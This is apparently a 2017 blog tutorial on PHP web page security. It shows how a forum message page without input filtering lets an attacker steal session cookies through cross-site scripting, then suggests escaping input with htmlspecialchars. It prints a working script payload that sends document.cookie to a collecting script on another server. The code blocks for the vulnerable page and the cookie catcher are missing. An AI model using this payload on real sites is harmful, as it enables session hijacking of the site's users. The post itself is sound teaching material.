segunda-feira, 2 de janeiro de 2017

Security in PHP web pages - Part 2

In the second part of this series of articles we will explore a forum-style message page to make a session hijacking attack.

First the page code is as follows:



Now the problem: the page input is not checked for the existence of potentially dangerous characters, so the page allows the execution of javascript.

In addition to small jokes that may be attempted, such as opening popups or redirecting the browser to other pages, the page is vulnerable to another type of attack that allows you to capture the session cookie and send it to another server. Is this the kind of attack we are going to demonstrate here.

With the following code inserted in the inputbox for the message we are going to have the browser try to open an image, which is actually a PHP script that will rescue the session cookie:

<script>document.write('<img src="http://localhost:8088/login/submitcookie.php?cookie='+escape(document.cookie)+'"/>');</script>

The PHP code that will capture the cookie is as follows:



In this case the code will create a text file with the value of the cookie, allowing the current session of the user can be captured by simply injecting this cookie into the browser of the attacker.

To make the page safe it is necessary to validate the input, for this we can create a function:
function test_input($data) {
$data = trim($data);
$data = stripslashes($data);
$data = htmlspecialchars($data);
return $data;
}
(code from www.w3schools.com)

Of course we should also use parameters instead of concatenated strings for SQL code.